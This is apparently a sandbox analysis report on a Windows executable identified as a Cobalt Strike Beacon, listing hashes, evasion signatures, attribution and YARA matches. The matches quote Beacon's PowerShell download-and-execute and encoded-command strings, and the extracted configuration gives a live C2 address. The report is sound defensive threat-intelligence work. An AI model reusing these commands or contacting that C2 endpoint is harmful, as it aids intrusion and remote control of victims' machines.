Edit tour

Windows Analysis Report
7xRIr23y7v.exe

Overview

General Information

Sample name:	7xRIr23y7v.exe renamed because original name is a hash value
Original sample name:	50c9f9b4fe6c26be872aff095e05a981.exe
Analysis ID:	1427167
MD5:	50c9f9b4fe6c26be872aff095e05a981
SHA1:	c8a0319c185e4f64775401a05bb20dc4aa4e56c6
SHA256:	66d79ffa703a6a51e4fa8dee5ad1ed9b5dc8b228a8e385a0fb1aa5994cb245c1
Tags:	CobaltStrikeexe
Infos:

Detection

CobaltStrike

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected CobaltStrike

Yara detected Powershell download and execute

C2 URLs / IPs found in malware configuration

Contains functionality to detect sleep reduction / modifications

Machine Learning detection for sample

Potentially malicious time measurement code found

Uses known network protocols on non-standard ports

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

7xRIr23y7v.exe (PID: 6160 cmdline: "C:\Users\user\Desktop\7xRIr23y7v.exe" MD5: 50C9F9B4FE6C26BE872AFF095E05A981)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"C2Server": "http://139.196.73.80:9902/WNwA", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\r\n"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2893779407.0000017DEA9A0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.2893779407.0000017DEA9A0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x137:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000002.2893026267.0000017DE2BE0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.2893026267.0000017DE2BE0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000002.2893026267.0000017DE2BE0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x7d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000002.2892307594.000000C0000D4000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.2892307594.000000C0000D4000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x391:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000002.2892307594.000000C0000D4000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x3fd:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2cfea:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d062:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d7cc:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2dafe:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2da90:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2dafe:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2d0c5:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d256:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2d10b:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d149:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2db48:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x2d3b6:$a11: Could not open service control manager on %s: %d 0x2d8e8:$a12: %d is an x64 process (can't inject x86 content) 0x2d918:$a13: %d is an x86 process (can't inject x64 content) 0x2dc39:$a14: Failed to impersonate logged on user %d (%u) 0x2d8a1:$a15: could not create remote thread in %d: %d 0x2d17f:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d84f:$a17: could not write to process memory: %d 0x2d3e7:$a18: Could not create service %s on %s: %d 0x2d470:$a19: Could not delete service %s on %s: %d 0x2d2d0:$a20: Could not open process token: %d (%u)
00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1963f:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3c3c2:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x16f19:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x181ca:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3c068:$loader_export: ReflectiveLoader 0x2cfa7:$exportname: beacon.dll
00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x2db48:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2d918:$x2: %d is an x86 process (can't inject x64 content) 0x2dafe:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2dbe2:$x4: Failed to impersonate token from %d (%u) 0x2dc39:$x5: Failed to impersonate logged on user %d (%u) 0x2cfea:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x17dfa:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ... 0x1719d:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2e9a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2ea1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f185:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2f4b7:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2f449:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2f4b7:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2ea7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2ec0f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2eac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2eb02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2f501:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x2ed6f:$a11: Could not open service control manager on %s: %d 0x2f2a1:$a12: %d is an x64 process (can't inject x86 content) 0x2f2d1:$a13: %d is an x86 process (can't inject x64 content) 0x2f5f2:$a14: Failed to impersonate logged on user %d (%u) 0x2f25a:$a15: could not create remote thread in %d: %d 0x2eb38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f208:$a17: could not write to process memory: %d 0x2eda0:$a18: Could not create service %s on %s: %d 0x2ee29:$a19: Could not delete service %s on %s: %d 0x2ec89:$a20: Could not open process token: %d (%u)
00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1a1f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x17ad2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x18d83:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x2f4b7:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2f501:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f2d1:$x3: %d is an x86 process (can't inject x64 content) 0x2ec89:$s1: Could not open process token: %d (%u) 0x2e9a3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2ed4c:$s4: Could not connect to pipe (%s): %d
00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3da21:$loader_export: ReflectiveLoader 0x2e960:$exportname: beacon.dll
00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x2f2a1:$x2: %d is an x64 process (can't inject x86 content) 0x2f5f2:$x3: Failed to impersonate logged on user %d (%u) 0x2f501:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f4b7:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2ec0f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x2f208:$s4: could not write to process memory: %d 0x2e9a3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2ed4c:$s6: Could not connect to pipe (%s): %d
00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x2f970:$str1: %s (admin) 0x2e960:$str2: beacon.dll
00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x2f501:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f2d1:$x2: %d is an x86 process (can't inject x64 content) 0x2f4b7:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2f59b:$x4: Failed to impersonate token from %d (%u) 0x2f5f2:$x5: Failed to impersonate logged on user %d (%u) 0x2e9a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x2f48f:$s1: %%IMPORT%% 0x2e987:$s2: www6.%x%x.%s 0x2e97b:$s3: cdn.%x%x.%s 0x2ec03:$s4: api.%x%x.%s 0x2f970:$s5: %s (admin) 0x2ec72:$s6: could not spawn %s: %d 0x2f533:$s7: Could not kill %d: %d 0x2ed4c:$s8: Could not connect to pipe (%s): %d 0x2e994:$s9: %s.1%x.%x%x.%s 0x2e9a3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2ea1b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2ea7e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2eac4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2eb02:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2eb38:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2eb61:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2eb86:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x2eba7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x2ebc4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x2ebdd:$s9: %s.1%08x%08x.%x%x.%s 0x2ebf2:$s9: %s.1%08x.%x%x.%s
Process Memory Space: 7xRIr23y7v.exe PID: 6160	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
Process Memory Space: 7xRIr23y7v.exe PID: 6160	JoeSecurity_CobaltStrike_1	Yara detected CobaltStrike	Joe Security
Process Memory Space: 7xRIr23y7v.exe PID: 6160	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 7xRIr23y7v.exe PID: 6160	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
Process Memory Space: 7xRIr23y7v.exe PID: 6160	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
Process Memory Space: 7xRIr23y7v.exe PID: 6160	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x4051:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f39d:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x40c9:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f415:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x482e:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2fb7a:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x4b56:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2fea2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x4ae8:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x4b56:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2fe34:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2fea2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x412c:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f478:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x42bd:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2f609:$a7: could not run command (w/ token) because of its length of %d bytes! 0x4172:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f4be:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x41b0:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2f4fc:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x4ba0:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
Process Memory Space: 7xRIr23y7v.exe PID: 6160	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x916c:$loader_export: ReflectiveLoader 0x918b:$loader_export: ReflectiveLoader 0x344b9:$loader_export: ReflectiveLoader 0x344d8:$loader_export: ReflectiveLoader 0x3e8e:$exportname: beacon.dll 0x4017:$exportname: beacon.dll 0x2f1da:$exportname: beacon.dll 0x2f363:$exportname: beacon.dll
Process Memory Space: 7xRIr23y7v.exe PID: 6160	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x4ba0:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2feec:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x497a:$x2: %d is an x86 process (can't inject x64 content) 0x2fcc6:$x2: %d is an x86 process (can't inject x64 content) 0x4b56:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2fea2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x4c3a:$x4: Failed to impersonate token from %d (%u) 0x2ff86:$x4: Failed to impersonate token from %d (%u) 0x4c91:$x5: Failed to impersonate logged on user %d (%u) 0x2ffdd:$x5: Failed to impersonate logged on user %d (%u) 0x4051:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f39d:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.7xRIr23y7v.exe.17dea720000.1.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.7xRIr23y7v.exe.17dea720000.1.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.7xRIr23y7v.exe.17dea720000.1.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2cfa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d01b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d785:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2dab7:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2da49:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2dab7:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2d07e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d20f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2d0c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2db01:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x2d36f:$a11: Could not open service control manager on %s: %d 0x2d8a1:$a12: %d is an x64 process (can't inject x86 content) 0x2d8d1:$a13: %d is an x86 process (can't inject x64 content) 0x2dbf2:$a14: Failed to impersonate logged on user %d (%u) 0x2d85a:$a15: could not create remote thread in %d: %d 0x2d138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d808:$a17: could not write to process memory: %d 0x2d3a0:$a18: Could not create service %s on %s: %d 0x2d429:$a19: Could not delete service %s on %s: %d 0x2d289:$a20: Could not open process token: %d (%u)
0.2.7xRIr23y7v.exe.17dea720000.1.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x195f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.7xRIr23y7v.exe.17dea720000.1.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x16ed2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x18183:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.7xRIr23y7v.exe.17dea720000.1.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x2dab7:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2db01:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x2d8d1:$x3: %d is an x86 process (can't inject x64 content) 0x2d289:$s1: Could not open process token: %d (%u) 0x2cfa3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d34c:$s4: Could not connect to pipe (%s): %d
0.2.7xRIr23y7v.exe.17dea720000.1.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3c021:$loader_export: ReflectiveLoader 0x2cf60:$exportname: beacon.dll
0.2.7xRIr23y7v.exe.17dea720000.1.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x2d8a1:$x2: %d is an x64 process (can't inject x86 content) 0x2dbf2:$x3: Failed to impersonate logged on user %d (%u) 0x2db01:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2dab7:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2d20f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x2d808:$s4: could not write to process memory: %d 0x2cfa3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2d34c:$s6: Could not connect to pipe (%s): %d
0.2.7xRIr23y7v.exe.17dea720000.1.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x2df70:$str1: %s (admin) 0x2cf60:$str2: beacon.dll
